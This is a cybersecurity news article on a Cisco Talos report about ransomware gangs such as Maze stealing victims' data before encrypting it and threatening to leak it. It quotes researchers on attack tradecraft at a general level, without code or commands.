zephyr_p - stock.adobe.com
Encrypting data may no longer suffice for threat actors deploying ransomware.
Cisco Talos researchers saw a "dangerous" new trend of ransomware attacks combining data exposure to pressure victims into paying, according to the company's Threat Assessment Report. The report, which was published Wednesday, highlights incident response trends from last fall, as well as recent threat activity during the winter.
"Ransomware actors have begun exfiltrating sensitive data from victim organizations and threatening to publish them if the ransom is not paid," the report stated.
Matt Olney, director at Cisco Talos, said he is distressed but not surprised by this trend. "If you have access to data to encrypt it, then you have the same level of access to steal it, and it only makes sense it's something that would evolve," he said.
The report noted Talos' incident response team observed two separate incidents this winter that involved ransomware attacks and the threat of sensitive data exposure. Both incidents involved the same threat actors, which Olney identified as the Maze ransomware group; Maze cybercriminals used penetration testing tool Cobalt Strike to move through the victims' networks and gather data before covertly exfiltrating sensitive data to an FTP server using PowerShell and then, finally, deploying ransomware in the environments.
So far, Maze ransomware gang is the only group Talos has observed utilizing this combination. But if these attacks are successful, Olney said other groups may follow, especially if a victim appears more motivated by the threat of data exposure as opposed to a conventional ransomware attack.
The top malware threats for fall 2019 remained Trickbot and Ryuk, according to the report. However, Talos researchers observed threat actors using an unusual method to deploy Ryuk, which targeted Active Directory to spread ransomware rather than using PsExec.
"Active Directory is an incredibly powerful asset for malicious actors to control," Olney said. "It's a mapping of both users and windows machines in a network. Even if you know nothing about a network, if you have access to active directory controllers, they'll be able to tell you everything you want to know, from a structural perspective, if not from a security perspective."
Once inside, threat actors gain access to administrator-level credentials and a list of every possible device they could use their malware on. In addition to deploying new tactics, the Cisco Talos report also said threat actors have also made advancements in victim profiling.
"Generally, they have some understanding of where they are," Olney said. "They're in a new network environment every time they successfully breach someone, so in order to put that victim in a position where they will consider paying ransom, they have to get their ransomware up on a large number of machines. They must learn where the Active Directory servers are, how things are set up, avoid being detected and disable security controls."
Olney said there's no indication threat actors are targeting specific companies, but Talos has seen some indications that there are favored vertical industries such as government, healthcare and manufacturing, which would suffer high costs with any down time.
No matter the victim, these attacks take more time than the average ransomware attack and involve months of research and reconnaissance. Olney said such attacks typically start with a Trickbot or Emotet infection and then several months later, after threat actors have profiled systems, threat actors use the knowledge and access they've achieved to encrypt a target's systems on a large scale.
Maze's techniques are not especially sophisticated or new, Olney said; using a simple PowerShell script for data exfiltration is relatively straightforward, for example. "Threat actors are looking for easy access using the tools they already have," he said.
Olney said the trend of data shaming ransomware victims is most likely here to stay. "I would be surprised if we didn't see more of that this year," he said.
Other security researchers have already observed similar activity beyond the Maze ransomware group. For example, endpoint protection vendor Morphisec reported in December that a Zeppelin ransomware attack on one of its customers exfiltrated the company's backup data before encrypting its systems. While the threat actors in this case used ConnectWise Control, a remote desktop application, for the initial intrusion, they also used PowerShell and Cobalt Strike in the attack.
Morphisec CTO Michael Gorelik told SearchSecurity he anticipates the majority of ransomware attacks will include attempts to exfiltrate and potentially expose victims' data. "The goal is to steal the information now, not just encrypt it," he said.